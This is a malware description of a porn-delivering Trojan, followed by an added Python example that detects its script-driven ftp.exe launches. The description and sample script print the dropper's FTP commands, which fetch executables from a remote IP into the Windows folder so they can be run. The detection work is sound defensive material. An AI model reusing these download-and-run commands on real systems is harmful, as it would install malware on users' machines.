This Trojan downloads components that deliver porn to the compromised system. The related files installed are
logon.exe - 69,632 bytes
abox.exe - 36,864 bytes
These files are commonly installed to the Windows folder, and may load via the system registry from the common RUN location.
When the Trojan is first run, it connects to the IP address 18.104.22.168 using the system's own command-line file transfer utility, FTP.EXE. The Trojan first writes an FTP script file named "Abox.ftp" into the TEMP folder and then runs FTP, passing the script as a parameter. The script instructs FTP to retrieve files by their remote name and copy them to the Windows folder:
get ABox.exe C:\WINNT\ABox.exe
get logon.exe C:\WINNT\logon.exe
get ABox.bup C:\WINNT\ABox.bup
The Windows folder name is determined before the FTP script is created. After all files are retrieved, both executables are run. The file "ABox.bup" contains update information for the Trojan.
The file "abox.exe" is referenced as "Fun Box" by the author.
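The behaviour described above (a dropper writing an FTP script to TEMP and driving FTP.EXE with it to pull executables into the Windows folder) is easy to spot from host telemetry once you know the pattern. The following is an added detection example, not code from the original description or from any vendor: it flags process-creation records where ftp.exe is started with a script file under TEMP (the `-s:` switch is the standard Windows ftp.exe option for running a script), and it parses such a script to list the local paths it would write into the Windows folder. The log records and the script text are constructed samples; the three "get" lines mirror the ones quoted in the description, while the "open"/"bye" framing lines and the record field names are assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation records in a generic EDR/Sysmon-like shape
# (field names "image", "cmdline", "parent" are assumed, not from the page).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\WINNT\system32\ftp.exe",
     "cmdline": r'ftp -s:"C:\WINNT\TEMP\Abox.ftp" 18.104.22.168',
     "parent": r"C:\WINNT\logon.exe"},
    {"image": r"C:\WINNT\system32\ftp.exe",
     "cmdline": r"ftp files.corp.example",          # interactive, no script
     "parent": r"C:\WINNT\system32\cmd.exe"},
    {"image": r"C:\WINNT\notepad.exe",
     "cmdline": r"notepad C:\WINNT\TEMP\notes.txt",  # TEMP path, wrong image
     "parent": r"C:\WINNT\explorer.exe"},
]

# Constructed copy of the dropper's FTP script. The "get" lines are the ones
# quoted in the description; "open" and "bye" are assumed framing commands.
SAMPLE_SCRIPT = """open 18.104.22.168
get ABox.exe C:\\WINNT\\ABox.exe
get logon.exe C:\\WINNT\\logon.exe
get ABox.bup C:\\WINNT\\ABox.bup
bye
"""

# ftp.exe accepts -s:<file> to run commands from a script; allow quoting.
SCRIPT_SWITCH = re.compile(r'-s:"?([^"\s]+)"?', re.IGNORECASE)
# "get <remote> <local>" lines; only lines with an explicit local path matter.
GET_LINE = re.compile(r"^\s*get\s+(\S+)\s+(\S+)\s*$", re.IGNORECASE)


def ftp_script_path(cmdline: str) -> Optional[str]:
    """Return the script path passed to ftp.exe via -s:, or None if absent."""
    match = SCRIPT_SWITCH.search(cmdline)
    return match.group(1) if match else None


def is_suspicious_ftp_launch(event: Dict[str, str]) -> bool:
    """True when ftp.exe is script-driven from a file under a TEMP folder.

    Interactive ftp use (no -s:) and non-ftp images are left alone, so the
    rule keys on the specific dropper pattern rather than on ftp.exe itself.
    """
    if not event["image"].lower().endswith("\\ftp.exe"):
        return False
    script = ftp_script_path(event["cmdline"])
    return script is not None and "\\temp\\" in script.lower()


def flag_events(events: List[Dict[str, str]]) -> List[str]:
    """Command lines of all records matching the script-driven ftp pattern."""
    return [e["cmdline"] for e in events if is_suspicious_ftp_launch(e)]


def dropped_files(script_text: str, windows_dir: str) -> List[str]:
    """Local paths the FTP script would write directly into windows_dir.

    windows_dir is compared case-insensitively; the returned paths keep the
    script's own spelling so they can be used as-is for triage/cleanup.
    """
    prefix = windows_dir.rstrip("\\").lower() + "\\"
    paths = []
    for line in script_text.splitlines():
        match = GET_LINE.match(line)
        if match and match.group(2).lower().startswith(prefix):
            paths.append(match.group(2))
    return paths


if __name__ == "__main__":
    for cmd in flag_events(SAMPLE_EVENTS):
        print("script-driven ftp.exe launch:", cmd)
        print("  script:", ftp_script_path(cmd))
    for path in dropped_files(SAMPLE_SCRIPT, r"C:\WINNT"):
        print("  would drop:", path)
```

In practice the Windows folder differs per host (the dropper resolves it at run time, as the description notes), so feed `dropped_files` the directory from the record's own environment rather than a fixed `C:\WINNT`; the TEMP check is likewise a starting point and can be widened to any user-writable path your baseline shows ftp.exe never reads scripts from.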
- Check the main screen using the web interface to ensure the latest AV/NIDS database has been downloaded and installed; if required, enable the "Allow Push Update" option.